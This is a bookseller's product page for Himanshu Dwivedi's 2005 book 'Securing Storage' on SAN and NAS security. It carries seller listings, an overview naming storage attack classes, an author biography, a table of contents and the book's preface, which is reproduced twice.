Securing Storage: A Practical Guide to SAN and NAS Security / Edition 1

Hardcover (Print)
Used and New from Other Sellers
Used and New from Other Sellers
from $26.22
Usually ships in 1-2 business days
(Save 52%)
Other sellers (Hardcover)
  • All (4) from $26.22   
  • New (2) from $106.90   
  • Used (2) from $26.22   
Close
Sort by
Page 1 of 1
Showing All
Note: Marketplace items are not eligible for any BN.com coupons and promotions
$106.90
Seller since 2008

Feedback rating:

(187)

Condition:

New — never opened or used in original packaging.

Like New — packaging may have been opened. A "Like New" item is suitable to give as a gift.

Very Good — may have minor signs of wear on packaging but item works perfectly and has no damage.

Good — item is in good condition but packaging may have signs of shelf wear/aging or torn packaging. All specific defects should be noted in the Comments section associated with each item.

Acceptable — item is in working order but may show signs of wear such as scratches or torn packaging. All specific defects should be noted in the Comments section associated with each item.

Used — An item that has been opened and may show signs of wear. All specific defects should be noted in the Comments section associated with each item.

Refurbished — A used item that has been renewed or updated and verified to be in proper working condition. Not necessarily completed by the original manufacturer.

New
0321349954 New. Looks like an interesting title!

Ships from: Naperville, IL

Usually ships in 1-2 business days

  • Standard, 48 States
  • Standard (AK, HI)
$195.00
Seller since 2014

Feedback rating:

(113)

Condition: New
Brand new.

Ships from: acton, MA

Usually ships in 1-2 business days

  • Standard, 48 States
  • Standard (AK, HI)
Page 1 of 1
Showing All
Close
Sort by

Overview

Systematically address your #1 enterprise security gap: storage

Securing Storage is an indispensable resource for every storage and security professional, and for anyone responsible for IT infrastructure, from architects and network designers to administrators.

You’ve invested heavily in securing your applications, operating systems, and network infrastructure. But you may have left one crucial set of systems unprotected: your SAN, NAS, and iSCSI storage systems. Securing Storage reveals why these systems aren’t nearly as secure as you think they are, and presents proven best practices for hardening them against more than 25 different attacks.

Securing storage is crucial to protecting intellectual property and trade secrets and complying with regulations ranging from Sarbanes-Oxley and HIPAA to Gramm-Leach-Bliley and SEC Rule 17a4. This book offers a complete blueprint for protecting all your storage systems–and all the data stored on them.

Most enterprises have failed to adequately address one crucial component of IT security: storage. The storage industry has largely failed to deliver secure solutions, and many IT professionals simply assume that security can be handled elsewhere. The result is a gaping security hole: it’s now far easier for internal attackers to compromise storage devices than to attack applications or operating systems. Now, for the first time, one of the world’s top storage security experts systematically reveals the weaknesses in SAN and NAS security–and offers robust, practical solutions.

Drawing on years of leading-edge research, renowned storage architect and security researcher HimanshuDwivedi explains why SAN and NAS systems have become an open target for unauthorized access and data compromise–and why “security by obscurity” strategies will fail to protect storage, just as they’ve failed elsewhere. Dwivedi offers expert, step-by-step guidance for evaluating your own storage environment, designing security into it, implementing storage security best practices, and optimizing the security settings on any shared storage device. He also presents a full chapter of real-world case studies.

Coverage includes

• Recognizing vulnerabilities that arise from inadequate perimeter security

• Understanding where attacks on storage devices typically originate

• Testing storage network security and audit compliance

• Protecting against SAN attacks: WWN spoofing, name server pollution, session hijacking, zoning hopping, e-port and f-port

   replication, LUN  mask subversion, and more

• Protecting NAS systems against attacks on Windows CIFS and Unix/Linux NFS protocols

• Defending against iSCSI attacks, from iQN spoofing to CHAP message reflection and offline password brute forcing

• Securing individual Fibre Channel and iSCSI SANs, NAS devices, and more

Read More Show Less

Product Details

  • ISBN-13: 9780321349958
  • Publisher: Addison-Wesley
  • Publication date: 11/11/2005
  • Edition description: New Edition
  • Edition number: 1
  • Pages: 560
  • Product dimensions: 7.25 (w) x 9.58 (h) x 1.34 (d)

Meet the Author

Himanshu Dwivedi is a founding partner of iSEC Partners, a digital security services and products organization. Before forming iSEC Partners (http://www.isecpartners.com), Himanshu was the Technical Director for @stake's San Francisco security practice, a leader in application and network security. His professional experience includes application programming, infrastructure security, and secure product design with an emphasis on storage risk assessment.

Himanshu is considered to be an industry expert in storage security. He has been published in major journals, magazines, and news articles regarding his storage security research. Himanshu has been invited to speak at several security and storage conferences in the United States and in Asia, such as Black Hat and Storage Networking World. Although specializing in SAN and NAS security, Himanshu's research includes storage technologies such as Fibre Channel, iSCSI, NFS, and CIFS as well as storage devices such as Fibre Channel switches, host bus adapters, storage controllers, iSCSI initiators, NAS filers, iSNS servers, NAS gateways, and encryption appliances. Himanshu has also written several tools for storage security assessment, including the iSCSI CHAP Password Tester and the Storage Port Scanner.

Himanshu currently has a patent pending on a storage design architecture that he co-developed with other professionals (U.S. Patent Serial No. 10/198,728). The patent is a security design for Fibre Channel storage networks. Himanshu has also published two other books, including Storage Networks: The Complete Reference, the "Security Considerations" chapter (McGraw-Hill/Osborne), and Implementing SSH:Strategies for Optimizing the Secure Shell (Wiley Publishing). Furthermore, Himanshu has also published two security white papers, including "Securing Intellectual Property" (http://www.vsi.org/resources/specs/ippwp310.pdf) and "Storage Security" (http://www.atstake.com/research/reports/acrobat/atstake_storage_networks.pdf).

© Copyright Pearson Education. All rights reserved.

Read More Show Less

Read an Excerpt

PrefacePreface

Storage security is the two-ton secret in your data center. It is the big white elephant that you walk by every day—you can see it from your desktop, you look for it on your servers, and you even rest your coffee mug on it every now and then. Despite the fact that the elephant is very large, heavy (two tons), albino (white), and sitting in the middle of the data center, it is the dirty little secret that no one speaks about. So why do people ignore such a large entity that can significantly damage their enterprise? The answers, as well as the solutions, are addressed in this book.

The storage industry is missing the mark in terms of security, data protection, availability, integrity, and compliance. The absence of security in storage makes it an open target for unauthorized access and data compromise. The most prominent security control for storage networks is the lack of knowledge many attackers have about the technology. Lack of knowledge, or better known as security by obscurity, never stands the test of time as shown in other technologies affected by security, such as application development, voice over IP, wireless, and even electronic voting stations. Furthermore, security by obscurity never passes a governmental compliance test for data protection or integrity.

The book's primary goal is to discuss security weaknesses and acceptable solutions for Storage Area Networks (SANs) and Network Attached Storage (NAS). The book will discuss the mechanisms to evaluate your own storage network, design security into storage networks, and implement security settings on common storage devices. The book will also cover the standard practices forsecuring storage by discussing strategies that will minimize security weaknesses in SAN and NAS architectures.

Before we dive deeper, let's define storage security for a moment. Security is an entity that can be applied to different things, such hosts, devices, networks, and communication mediums. Security can also be applied in several methods, such as encryption, access controls, authentication, checksums, logging, or dedicated products. Similarly, storage is an entity that is also applied in many ways. It can be applied as media (tapes, CD-ROMs, disk drives, USB drives), a communications medium (Internet Protocol, Fibre Channel, iSCSI), or even a network (Network Attached Storage or Storage Area Networks). Based on their different descriptions, security and storage traditionally are two items that are not usually paired together. Storage concentrates on holding data, while security concentrates on protecting data. Nevertheless, it is interesting that both entities address data needs and concerns, yet have not been addressed in a complementary fashion.

There are several reasons why security and storage are two strangers. One incorrect assumption is that storage does not need security because it already has been addressed elsewhere in a network, which unfortunately is not true. It is often unnoticed that it is easier for internal attackers to compromise storage devices when compared to applications or operating systems. For example, unlike most applications and operating systems, many storage devices do not even require authentication to get access to large volumes of data, a fact that would never pass on most security audits. Furthermore, if an internal server has ever been affect by a virus or worm, the perimeter of the network is probably not as secure as a Visio document may picture it to look. The fact is the network perimeter has disappeared with the advent of wireless networks, remote VPN users, site-to-site VPNs with business partners, back-end support connections, and internal unauthorized users such as contractors/consultants. This fact, combined with the large amount of internal data heists occurring every month, make storage a prime target of attackers. Compliance entities have also realized that data is not protected adequately and its integrity is at risk on the storage network.

It is often overlooked that perimeter security controls are easily subverted to gain access to entities connected to the storage network, thus creating an open gateway. It is also assumed that unauthorized users attack from their own machines, but actually they attack from compromised management servers, administrator workstations, or compromised applications. Another assumption is that if any entity, such as an application data owner, can gain access to the stored data, they must have been authorized to do so; thus, having the ability to access data equates into the authorization to access data, again simply not true (especially for regulated data). For example, if an Exchange administrator has access to the Exchange server, it does not mean that he or she is authorized to read everyone's email. Furthermore, the ability for unauthenticated users to connect directly to the storage network and view, copy, and delete data does not mean all users should have that authority. The assumptions also carry over to different organizational groups. Security groups are often preoccupied with network and application attacks to fully understand the high risks of insecure storage. Additionally, the storage group's lack of information security background combined with their focus on performance and capacity concerns make security a neglected entity. All these assumptions and groups make it hard to realize that a large amount of data is sitting wide open in the storage network for anyone to compromise.What Does It Mean to Secure Storage?

What does it mean to secure storage? For the purposes of this book, securing storage is the process of assessing, implementing, and testing security on existing SAN and NAS architectures. The book will focus on the following items:

  • How do I assess my storage network for best practices?
  • How do I test my storage network from attacks and compliance breaches?
  • How do I implement security on my storage network based on industry standards?

The book will cover three primary themes. The first theme is to provide guidance and assessment techniques for storage networks. The second theme is to provide testing procedures for SAN and NAS architectures. The third theme of this book will discuss the security solutions for each attack class and security exposure currently presented on storage networks and devices. The book will discuss many security specifications and industry standards and how they affect storage security overall. SAN and NAS Security

Storage Area Networks (SANs) and Network Attached Storage (NAS) are two types of storage networks. SANs have been based primarily on Fibre Channel (FC), with iSCSI becoming more popular, and NAS architectures have primarily been based on IP using CIFS or NFS. Both types of storage networks have one thing in common: SANs and NAS are not used for backup anymore.

Data from the storage network is being presented to applications and hosts in all parts of the network, which do not hold a high level of security. For example, a Fibre Channel SAN may be connected to a web or database cluster that is available to the Internet or internal network, allowing a single comprised web/database server to be the gateway to the SAN. If the SAN was using iSCSI, the storage device would be easier to break into. The attacker would only need to connect to the IP network and connect to the iSCSI storage device, bypassing the database application and web server all together. Furthermore, a NAS device might be holding medical data (patient information) that can be assessed by authorized doctors; however, it is also stored in clear-text, allowing any system administrator to access the sensitive data.

The need for SAN and NAS security is long overdue. This book will describe the specific implementation steps to deploy SAN and NAS security options, while also discussing the different ways to fully optimize current storage architectures. This book can also be used by organizations that have deployed a storage network and are interested in learning more ways to secure it. Block Data Versus File Data

In order to understand security threats for storage networks, it is important to understand the differences between file-level data and block-level data. NAS storage devices support file-level data, which is the traditional type of data we are accustomed to on PC systems. NAS devices using file-level data present file systems remotely over the network. An entire file system, a partial file system, or even a single individual file can be presented to a remote server over the network. File-level data using NFS and CIFS (SMB) are the traditional methods of deployment. SAN storage devices use block data, where an entire SCSI partition is presented over the network. Unlike file-level data, block data does not present individual files, folders, or even file systems, but the entire drive (block) itself (usually 50 to 100 gigabytes in size at a time). For example, think of file-level data as an access to the remote file system (partial or full); however, think of block-level data as an access to the entire hard drive (regardless of file system type) over the network. Block data is like having two or three more hard drives inside a server, but presented to the server over the network using iSCSI or Fibre Channel and not installed inside the machine using IDE or SCSI ribbons.

The other difference between file-level data and block-level data is that file-level data (NAS devices) contain multi-system support and block data blocks usually do not. Multiple machines or users can access the same remote file system (NFS or CIFS) at the same time as long as it is formatted to the correct file system time (such as NTFS or FAT for Windows). On the other hand, block data is not necessarily meant to have multiple systems connected to a single block of data at the same time. (Note: Some Fibre Channel and iSCSI SANs do support multiple connections to the same block data, but it is not the default.) It would be difficult for a single hard drive to have two IDE or SCSI ribbons connected to two separate servers; similarly, block data does not usually have multiple servers connected to it at the same time. It is possible for multiple systems to connect to the same block data repository over iSCSI or Fibre Channel; however, it results in a denial-of-service problem because two separate servers are trying to mount the same block data. Until one of the servers stops sending requests for the block data, the other will not be able to access it either.

The key idea to understand with either file or block data is that they are both data targets that contain large amounts of data viewable to any attacker or unauthorized user. File data is what most systems are accustomed to. Block data, however, is just as valuable to an attacker (if not more) since it contains large volumes of data but in block format, which is just as easy to mount and read as file-level data but requires different mounting and reading steps.

The following table briefly summarizes the difference between block and file data.

Block Data

File Data

SANs

NASs

Block format (hard drive)

File format (file system)

Usually one system per block

Multiple systems per folder

SCSI via iSCSI or Fibre Channel

NFS or CIFS via IP

New hard drives over the network

New file systems over the network

The top figure shows a mounted drive (Disk 1) for block data. The bottom figure shows a mounted file system (X:\) for file data.Why Storage Security?

The necessity for storage security is similar to the need for security on any other entity of high value in your organization. For example, the popularity of patching utilities and anti-virus applications are not necessarily for their ability to provide security protection (even though that is an important benefit), but rather their ability to improve uptime and availability of computer systems, networks, and data integrity. Similarly, the unavailability of a storage network or the lack of integrity of data, which would leave an organization in a state of disarray, has a much bigger impact than an infected laptop or an offline application. A good example of this is the SASSER-RPC worm released in 2004 that targeted Microsoft operating systems. Although the worm was intended for Windows, many storage devices that support Windows protocols, such as CIFS and SMB, were also vulnerable, which essentially made the storage device unusable until a full system reboot and patch. The risk of data being unavailable, corrupted, abused, or even deleted will cause tremendous financial harm and storage downtime for many organizations. Furthermore, the regulatory issues that involve storage networks are confusing at best, requiring a resource to guide everyone through the process.

This book's primary attraction is its ability to discuss, demonstrate, and prioritize the storage security issues that every organization faces. The book will not use high-level or abstract language and fail to provide any details, but rather provide an abundant amount of security details to allow readers to finally understand what the real issues are with storage security and how they can asses the risk for themselves. The book will also provide details to distinguish the high-risk/high-impact issues versus low-risk/nominal-impact issues.

A key purpose for the book is to provide a clear understanding of the technology. Storage security is a relatively new industry and can be an overwhelming topic. Several years ago when I began researching storage and security, there were no storage security products, web sites, or whitepapers about storage security. There were only a few people willing to talk to me about the seriousness of storage security. Years later, there is not only an entire industry on securing storage, with large companies like Symantec and Veritas merging together, but with its new popularity, there is a lot more confusion.

The need to secure storage is important on many levels. From a security perspective, many organizations (and their security departments), are not aware of the data protection issues surrounding storage. From the storage perspective, many storage administrators are unaware of the security issues that will affect system uptime and data availability.

Another reason why storage security is needed is for the ease of comprehension. There are many sources that discuss attack classes in storage, but a few actually provide risk exposure descriptions. A key goal of this book is not to force arbitrary risk levels on your organizations, but to describe the threat vector and attack surface in detail and allow readers to deduce their own risk based on the outcomes of these possible attacks. Readers will find out that security attacks don't change, but get modified and improved (just like viruses and worms). History has shown that attack classes that affected networks in the 1990s will also affect applications in the 2000s. Similarly, the same attack classes, such as segmentation weakness, poor session maintenance, and poor authentication, have also affected storage networks. However, a successful attack on storage equates to data loss or outright compromise.

The completion of this book will provide a very detailed guide of securing storage and understanding attacks.Regulations and Storage

Regulatory issues facing storage have created significant legal issues for many financial, e-commerce, and medical organizations. New acts and policies such as the Health Insurance Portability and Accountability Act (HIPAA), Sarbanes-Oxley, Gramm-Leach Bliley Act (GLBA), SEC Rule 17a-4, DOD (Department of Defense) 5015, and California's SB1386 (Senate Bill 1386) are making a sizable impact on how the storage of data must be protected from unauthorized users, even if those unauthorized users are not hackers but internal employees. Furthermore, as internal audit groups and external IT auditors begin to understand that sensitive data is residing in the storage network/ devices (as opposed to servers or desktops), the focus will shift away from operating system security to storage networking security.

Government regulations primarily focus on security controls and auditing practices. A key issue for many storage networks, devices, and protocols is their lack of any security controls to protect data at-rest or in-flight. Additionally, government regulations don't decipher the difference between controls against outside attackers versus malicious internal employees. The fact that data is easier to compromise on a storage filer versus an operating system only adds to the storage security problem.

Regulations have highlighted an overlying issue of data protection. Data, whether it is financial data, non-public private information, or medical data, needs to be protected from unauthorized external and internal entities at all times. Government regulations have only helped raise the concerns that have existed since the first SAN or NAS network.Best-Practice Benefits

Parts of certain chapters in this book are solely dedicated to best practices. Best practices are important in order to understand standard methods of secure deployment; however, they should not be used as inflexible guidelines. Implementation of security standards and practices will depend on the details and specifics of a storage network.

Best practices can be best described as items that are a prerequisite in order to deploy an acceptable amount of security in any given entity. Some of the sample best practices to secure storage are as follows:

  • High-level architecture (defense in depth)
  • Multi-layer architecture
  • Authentication with authorization
  • Encryption
  • Integrity
  • Auditing
  • Detailed implementation guidelines
  • Node hardening
  • Zoning
  • LUN masking
  • CT/CHAP authentication
  • SSL and IPSec encryption
  • At-rest (AES or SHA1) encryption
  • Management access
Who Should Read This Book

This book targets individuals who are responsible for IT infrastructure. Examples of these individuals are IT managers, storage administrators, network designers, architects, and engineers who want to evaluate security in storage architectures. It will also serve the needs of security consultants, engineers, architects, managers, auditors, trainers, and technical marketing managers who want to update their backgrounds in storage security.

The book is targeted toward readers who want to learn the common "how-tos" of securing storage. Readers requiring an essential reference guide can use the book as their primary resource. Generally speaking, this book is targeted for three types of individuals:

  • Individuals who are interested in establishing or expanding their knowledge of securing storage
  • Individuals who are interested in learning how to assess and audit their own storage networks
  • Individuals who are looking for best practices or new strategies for storage security

The book's audience will range from novice readers who are looking for the basics behind storage architectures, networking, and LANs, to moderately skilled administrators looking to gain information on Fibre Channel communication, iSCSI, and Internet Protocol.

Readers will benefit from the book in several different ways. First, readers will be able to remove the confusion from securing storage. Readers will be able to qualify the risk of their storage network with a clear description of the security issues in storage. Readers will also learn the security principles for designing, testing, and evaluating storage networks. Several chapters have hands-on self-assessment steps for critical security threats and vulnerabilities. Additionally, best practices security measures are discussed in the context of data availability, integrity, and compliance requirements. Finally, readers will understand the security concerns for storage and be able to determine the impact of each issue.

This book will provide readers with the data center's guide to analyzing, testing, and implement SAN and NAS security. This book will cover common "how-tos," provide the all-essential "reference steps," and provide recommendations for storage security best practices.

The book is not necessarily meant to be read from start to finish, but instead can be a quick reference, where individual chapters are self supporting without knowledge of prior chapters. For example, if a reader needs to understand how to secure a brocade Fibre Channel switch, he can turn directly to Chapter 4, "SANs: Zone and Switch Security." The book can provide insight for the following types of individuals:

  • Individuals interested in a practical method to secure SAN and NAS networks
  • Individuals interested in assessing the security of their existing SAN and NAS networks
  • Individuals interested in testing the security of their existing SAN and NAS networks
  • Individuals interested in expanding their security knowledge on emerging storage technologies, such as encryption, authentication, and management
  • Individuals interested in understanding how governmental regulations and compliance requirements affect storage
How This Book Is Organized

This book is organized into five parts consisting of fourteen chapters that include details on SAN security, NAS security, iSCSI security, storage defenses, polices, trends, and case studies.

The first three parts discuss core issues with SAN and NAS security, attacks against SAN and NAS devices, and SAN and NAS security solutions. These chapters target some of the most important topics in securing storage, as well as testing procedures for each attack class.

Chapter 1 begins with an overview of storage security, covering its basic premise, the problems encountered, typical uses, and future trends. Additionally, an overview of security and storage standards is discussed.

Chapters 2 through 4 discuss SAN security risks, including weaknesses of Fibre Channel (FC) and adjoining devices, such as switches and host-bus adapters (HBAs). Additionally, these chapters discuss SAN attacks, self-assessment steps (which allow readers to perform checks against their storage architecture), and mitigating solutions.

Chapters 5 and 7 are similar to Chapters 2 through 4, but focus on NAS architectures instead of SANs. Chapter 5 discusses the risks associated with NAS storage devices using IP protocols such as NFS and CIFS.

Chapters 6 and 7 discuss CIFS and NFS security issues, attacks, self-assessment steps, and mitigating solutions for storage architectures.

Chapter 8 discusses iSCSI security, including an overview of iSCSI communication, risks associated with iSCSI storage devices, and a discussion of the iSCSI attacks.

Part Four of the book focuses on storage defenses. Chapter 9 is a discussion on securing Fibre Channel SANs, Chapter 10 discusses the security of NFS/CIFS NAS, and Chapter 11 discusses the methods to secure iSCSI SANs. These chapters concentrate on how to take existing storage devices and ensure that they secure themselves. Part Five of the book shifts focus from SAN and NAS security risks and attacks, to larger storage security issues, such as emerging security technologies, regulations, and case studies. These three chapters discuss security from the adherence perspective, both from the governmental aspect as well as from best practices. Chapter 12 discusses some of the major governmental policies that affect storage architectures. Chapter 13 discusses how to audit your storage network based on the government compliances and security best practices. Finally, Chapter 14 is a discussion of real-world case studies in storage environments. Examples describe SAN and NAS architectures with the optimal amount of security and functionality.How This Book Is Written

The book is written to address the topic of securing storage from a technology perspective. It does not discuss the proper paper policies and procedures that should be in place, nor does it describe the human processes of security as it pertains to storage. It also does not discuss storage security at a high level, but does specifically discuss how storage systems, networks, and protocols are affected by security. The key difference this book will offer is not to generically say storage has security problems and glaze over the details, but to start with the details first.

The book discusses the security weaknesses, threats, exploits, and attacks of storage systems, networks, and technologies in Chapters 2 through 8. After the discussion is complete, the book discusses the mitigating solutions of each prior attack identified in Chapters 9 through 14. The reason for a deep discussion of the attacks is because it is very difficult to discuss solutions only without any context of the problem. Although some vendors will not appreciate the fact that this book exposes problems, it is not written to embarrass any vendor or to prevent end-users from adopting storage devices, but instead to show organizations why certain security mitigations and solutions need to be in place when deploying a storage network. For example, after a virus infects a user's machine, it is easier to discuss why anti-virus software and host hardening procedures are very important items. The same idea applies to storage. Organizations will understand why taking active steps to secure storage is important after reviewing the attacks in Fibre Channel, iSCSI, CIFS, and NFS.

The book makes an attempt to classify the risk of each identified problem; however, the discussion is limited because risk is best measured when applied to specific scenarios and not generic examples. Many attacks shown in this book can be classified as low risk, but they are still discussed to expose the reader to the security problem. Conversely, many attacks shown in the book are also high risk and are shown to its full extent and detail.

The book is not vendor specific, but rather protocol specific (Fibre Channel and iSCSI for SANs and NFS and CIFS for IP NAS).

The book holds storage systems, networks, and protocols to the same standard of security as operating systems, wireless networks, and application security. Storage security strengths are discussed to show the reader the positive security aspects of storage; however, it also shows failed or poor security attempts in storage systems, networks, and protocols. The book does not give storage devices/networks any "breaks" since it is an emerging technology. Any system and/or network that controls a large portion of an organization's data must be held to the same high security standard expected from operating system vendors or even application product vendors.

Finally, the book is written in the context of full disclosure. The goal is to allow each reader to receive enough information to read, perform, and analyze each security problem and each discussion about the mitigating solution. This model should allow the reader to make risk acceptability decisions based on their own storage environment.

© Copyright Pearson Education. All rights reserved.

Read More Show Less

Table of Contents

Ch. 1 Introduction to storage security 1
Ch. 2 SANs : fibre channel security 31
Ch. 3 SANs : LUN masking and HBA security 71
Ch. 4 SANs : zone and switch security 105
Ch. 5 NAS security 149
Ch. 6 NAS : CIFS security 163
Ch. 7 NAS : NFS security 237
Ch. 8 SANs : iSCSI security 275
Ch. 9 Securing fibre channel SANs 337
Ch. 10 Securing NAS 369
Ch. 11 Securing iSCSI 401
Ch. 12 Compliance, regulations, and storage 429
Ch. 13 Auditing and securing storage devices 451
Ch. 14 Storage security case studies 495
Read More Show Less

Preface

Preface

Storage security is the two-ton secret in your data center. It is the big white elephant that you walk by every day—you can see it from your desktop, you look for it on your servers, and you even rest your coffee mug on it every now and then. Despite the fact that the elephant is very large, heavy (two tons), albino (white), and sitting in the middle of the data center, it is the dirty little secret that no one speaks about. So why do people ignore such a large entity that can significantly damage their enterprise? The answers, as well as the solutions, are addressed in this book.

The storage industry is missing the mark in terms of security, data protection, availability, integrity, and compliance. The absence of security in storage makes it an open target for unauthorized access and data compromise. The most prominent security control for storage networks is the lack of knowledge many attackers have about the technology. Lack of knowledge, or better known as security by obscurity, never stands the test of time as shown in other technologies affected by security, such as application development, voice over IP, wireless, and even electronic voting stations. Furthermore, security by obscurity never passes a governmental compliance test for data protection or integrity.

The book's primary goal is to discuss security weaknesses and acceptable solutions for Storage Area Networks (SANs) and Network Attached Storage (NAS). The book will discuss the mechanisms to evaluate your own storage network, design security into storage networks, and implement security settings on common storage devices. The book will also cover the standard practices for securing storage by discussing strategies that will minimize security weaknesses in SAN and NAS architectures.

Before we dive deeper, let's define storage security for a moment. Security is an entity that can be applied to different things, such hosts, devices, networks, and communication mediums. Security can also be applied in several methods, such as encryption, access controls, authentication, checksums, logging, or dedicated products. Similarly, storage is an entity that is also applied in many ways. It can be applied as media (tapes, CD-ROMs, disk drives, USB drives), a communications medium (Internet Protocol, Fibre Channel, iSCSI), or even a network (Network Attached Storage or Storage Area Networks). Based on their different descriptions, security and storage traditionally are two items that are not usually paired together. Storage concentrates on holding data, while security concentrates on protecting data. Nevertheless, it is interesting that both entities address data needs and concerns, yet have not been addressed in a complementary fashion.

There are several reasons why security and storage are two strangers. One incorrect assumption is that storage does not need security because it already has been addressed elsewhere in a network, which unfortunately is not true. It is often unnoticed that it is easier for internal attackers to compromise storage devices when compared to applications or operating systems. For example, unlike most applications and operating systems, many storage devices do not even require authentication to get access to large volumes of data, a fact that would never pass on most security audits. Furthermore, if an internal server has ever been affect by a virus or worm, the perimeter of the network is probably not as secure as a Visio document may picture it to look. The fact is the network perimeter has disappeared with the advent of wireless networks, remote VPN users, site-to-site VPNs with business partners, back-end support connections, and internal unauthorized users such as contractors/consultants. This fact, combined with the large amount of internal data heists occurring every month, make storage a prime target of attackers. Compliance entities have also realized that data is not protected adequately and its integrity is at risk on the storage network.

It is often overlooked that perimeter security controls are easily subverted to gain access to entities connected to the storage network, thus creating an open gateway. It is also assumed that unauthorized users attack from their own machines, but actually they attack from compromised management servers, administrator workstations, or compromised applications. Another assumption is that if any entity, such as an application data owner, can gain access to the stored data, they must have been authorized to do so; thus, having the ability to access data equates into the authorization to access data, again simply not true (especially for regulated data). For example, if an Exchange administrator has access to the Exchange server, it does not mean that he or she is authorized to read everyone's email. Furthermore, the ability for unauthenticated users to connect directly to the storage network and view, copy, and delete data does not mean all users should have that authority. The assumptions also carry over to different organizational groups. Security groups are often preoccupied with network and application attacks to fully understand the high risks of insecure storage. Additionally, the storage group's lack of information security background combined with their focus on performance and capacity concerns make security a neglected entity. All these assumptions and groups make it hard to realize that a large amount of data is sitting wide open in the storage network for anyone to compromise.

What Does It Mean to Secure Storage?

What does it mean to secure storage? For the purposes of this book, securing storage is the process of assessing, implementing, and testing security on existing SAN and NAS architectures. The book will focus on the following items:

  • How do I assess my storage network for best practices?
  • How do I test my storage network from attacks and compliance breaches?
  • How do I implement security on my storage network based on industry standards?

The book will cover three primary themes. The first theme is to provide guidance and assessment techniques for storage networks. The second theme is to provide testing procedures for SAN and NAS architectures. The third theme of this book will discuss the security solutions for each attack class and security exposure currently presented on storage networks and devices. The book will discuss many security specifications and industry standards and how they affect storage security overall.

SAN and NAS Security

Storage Area Networks (SANs) and Network Attached Storage (NAS) are two types of storage networks. SANs have been based primarily on Fibre Channel (FC), with iSCSI becoming more popular, and NAS architectures have primarily been based on IP using CIFS or NFS. Both types of storage networks have one thing in common: SANs and NAS are not used for backup anymore.

Data from the storage network is being presented to applications and hosts in all parts of the network, which do not hold a high level of security. For example, a Fibre Channel SAN may be connected to a web or database cluster that is available to the Internet or internal network, allowing a single comprised web/database server to be the gateway to the SAN. If the SAN was using iSCSI, the storage device would be easier to break into. The attacker would only need to connect to the IP network and connect to the iSCSI storage device, bypassing the database application and web server all together. Furthermore, a NAS device might be holding medical data (patient information) that can be assessed by authorized doctors; however, it is also stored in clear-text, allowing any system administrator to access the sensitive data.

The need for SAN and NAS security is long overdue. This book will describe the specific implementation steps to deploy SAN and NAS security options, while also discussing the different ways to fully optimize current storage architectures. This book can also be used by organizations that have deployed a storage network and are interested in learning more ways to secure it.

Block Data Versus File Data

In order to understand security threats for storage networks, it is important to understand the differences between file-level data and block-level data. NAS storage devices support file-level data, which is the traditional type of data we are accustomed to on PC systems. NAS devices using file-level data present file systems remotely over the network. An entire file system, a partial file system, or even a single individual file can be presented to a remote server over the network. File-level data using NFS and CIFS (SMB) are the traditional methods of deployment. SAN storage devices use block data, where an entire SCSI partition is presented over the network. Unlike file-level data, block data does not present individual files, folders, or even file systems, but the entire drive (block) itself (usually 50 to 100 gigabytes in size at a time). For example, think of file-level data as an access to the remote file system (partial or full); however, think of block-level data as an access to the entire hard drive (regardless of file system type) over the network. Block data is like having two or three more hard drives inside a server, but presented to the server over the network using iSCSI or Fibre Channel and not installed inside the machine using IDE or SCSI ribbons.

The other difference between file-level data and block-level data is that file-level data (NAS devices) contain multi-system support and block data blocks usually do not. Multiple machines or users can access the same remote file system (NFS or CIFS) at the same time as long as it is formatted to the correct file system time (such as NTFS or FAT for Windows). On the other hand, block data is not necessarily meant to have multiple systems connected to a single block of data at the same time. (Note: Some Fibre Channel and iSCSI SANs do support multiple connections to the same block data, but it is not the default.) It would be difficult for a single hard drive to have two IDE or SCSI ribbons connected to two separate servers; similarly, block data does not usually have multiple servers connected to it at the same time. It is possible for multiple systems to connect to the same block data repository over iSCSI or Fibre Channel; however, it results in a denial-of-service problem because two separate servers are trying to mount the same block data. Until one of the servers stops sending requests for the block data, the other will not be able to access it either.

The key idea to understand with either file or block data is that they are both data targets that contain large amounts of data viewable to any attacker or unauthorized user. File data is what most systems are accustomed to. Block data, however, is just as valuable to an attacker (if not more) since it contains large volumes of data but in block format, which is just as easy to mount and read as file-level data but requires different mounting and reading steps.

The following table briefly summarizes the difference between block and file data.

Block Data

File Data

SANs

NASs

Block format (hard drive)

File format (file system)

Usually one system per block

Multiple systems per folder

SCSI via iSCSI or Fibre Channel

NFS or CIFS via IP

New hard drives over the network

New file systems over the network

The top figure shows a mounted drive (Disk 1) for block data. The bottom figure shows a mounted file system (X:\) for file data.

Why Storage Security?

The necessity for storage security is similar to the need for security on any other entity of high value in your organization. For example, the popularity of patching utilities and anti-virus applications are not necessarily for their ability to provide security protection (even though that is an important benefit), but rather their ability to improve uptime and availability of computer systems, networks, and data integrity. Similarly, the unavailability of a storage network or the lack of integrity of data, which would leave an organization in a state of disarray, has a much bigger impact than an infected laptop or an offline application. A good example of this is the SASSER-RPC worm released in 2004 that targeted Microsoft operating systems. Although the worm was intended for Windows, many storage devices that support Windows protocols, such as CIFS and SMB, were also vulnerable, which essentially made the storage device unusable until a full system reboot and patch. The risk of data being unavailable, corrupted, abused, or even deleted will cause tremendous financial harm and storage downtime for many organizations. Furthermore, the regulatory issues that involve storage networks are confusing at best, requiring a resource to guide everyone through the process.

This book's primary attraction is its ability to discuss, demonstrate, and prioritize the storage security issues that every organization faces. The book will not use high-level or abstract language and fail to provide any details, but rather provide an abundant amount of security details to allow readers to finally understand what the real issues are with storage security and how they can asses the risk for themselves. The book will also provide details to distinguish the high-risk/high-impact issues versus low-risk/nominal-impact issues.

A key purpose for the book is to provide a clear understanding of the technology. Storage security is a relatively new industry and can be an overwhelming topic. Several years ago when I began researching storage and security, there were no storage security products, web sites, or whitepapers about storage security. There were only a few people willing to talk to me about the seriousness of storage security. Years later, there is not only an entire industry on securing storage, with large companies like Symantec and Veritas merging together, but with its new popularity, there is a lot more confusion.

The need to secure storage is important on many levels. From a security perspective, many organizations (and their security departments), are not aware of the data protection issues surrounding storage. From the storage perspective, many storage administrators are unaware of the security issues that will affect system uptime and data availability.

Another reason why storage security is needed is for the ease of comprehension. There are many sources that discuss attack classes in storage, but a few actually provide risk exposure descriptions. A key goal of this book is not to force arbitrary risk levels on your organizations, but to describe the threat vector and attack surface in detail and allow readers to deduce their own risk based on the outcomes of these possible attacks. Readers will find out that security attacks don't change, but get modified and improved (just like viruses and worms). History has shown that attack classes that affected networks in the 1990s will also affect applications in the 2000s. Similarly, the same attack classes, such as segmentation weakness, poor session maintenance, and poor authentication, have also affected storage networks. However, a successful attack on storage equates to data loss or outright compromise.

